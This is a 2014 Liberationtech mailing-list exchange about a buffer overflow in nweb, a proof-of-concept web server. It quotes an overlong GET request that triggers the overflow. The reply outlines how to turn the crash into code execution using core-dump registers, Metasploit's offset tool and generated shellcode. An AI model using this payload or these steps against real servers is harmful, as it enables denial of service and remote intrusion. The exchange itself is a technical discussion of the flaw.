[liberationtech] nweb + Tor
Jorge SoydelBierzo
berciano at soydelbierzo.com
Mon Jan 20 18:32:28 PST 2014
I tested this several years ago; maybe the GET needs to be bigger for a
buffer overflow (over 1012 bytes; it doesn't matter whether you use A, U or 5 ;-D).
When the buffer overflow works, you get a core dump file.
With the ESP and EIP values from the core dump, and the patternOffset tool from
Metasploit, you can calculate word alignment, EIP offset, etc.
With the ESP value, buffer size, ESP offset and generated shellcode, using
http-esploit.pl you can make a payload to send to nweb.
Nweb is a PoC; I hope nobody uses it in the wild.
On Tuesday, 21 January 2014, Andrés Leopoldo Pacheco Sanfuentes <alps6085 at gmail.com> wrote:
> On Mon, Jan 20, 2014 at 7:06 PM, Jonathan Wilkes <jancsika at yahoo.com>
> wrote:
> > GET
> >
> /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAA
> >
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > HTTP/1.0
>
>
> would it work the same if one replaced the "A" with "U," for example? :D
>
> Best Regards | Cordiales Saludos | Grato,
>
> Andrés L. Pacheco Sanfuentes
> <alps at acm.org>
> +1 (817) 271-9619
> --
> Liberationtech is public & archives are searchable on Google. Violations
> of list guidelines will get you moderated:
> https://mailman.stanford.edu/mailman/listinfo/liberationtech.
> Unsubscribe, change to digest, or change password by emailing moderator at
> companys at stanford.edu.
>